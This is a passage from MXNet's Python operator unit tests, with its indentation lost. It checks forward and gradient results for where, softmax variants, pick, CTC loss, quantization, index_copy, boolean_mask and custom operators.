assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@unittest.skip("Flaky test. Tracked in https://github.com/apache/incubator-mxnet/issues/13600")
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
nparr = ndarr.asnumpy()
assert_almost_equal(nparr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
dtype_softmax_np = dtype_softmax.asnumpy()
ref_softmax_np = ref_softmax.asnumpy()
assert_almost_equal(dtype_softmax_np, ref_softmax_np, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
dtype_grad_np = dtype_input.grad.asnumpy()
ref_grad_np = ref_input.grad.asnumpy()
assert_almost_equal(dtype_grad_np, ref_grad_np, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for _ in range(100):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
check_ctc_loss(acts, labels, true_loss)
check_contrib_ctc_loss(acts, labels, true_loss)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels2, true_loss)
check_contrib_ctc_loss(acts2, labels2, true_loss)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels3, true_loss)
check_contrib_ctc_loss(acts2, labels3, true_loss)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss.asnumpy(), expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
check_ctc_loss_grad('first')
check_ctc_loss_grad('last')
check_contrib_ctc_loss_grad('first')
check_contrib_ctc_loss_grad('last')
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
assert same(qa.asnumpy(), qa_real.asnumpy())
assert same(a_.asnumpy(), a_real.asnumpy())
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output.asnumpy(), expected_output.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(x2.grad.asnumpy(), expected_grad.asnumpy(), rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
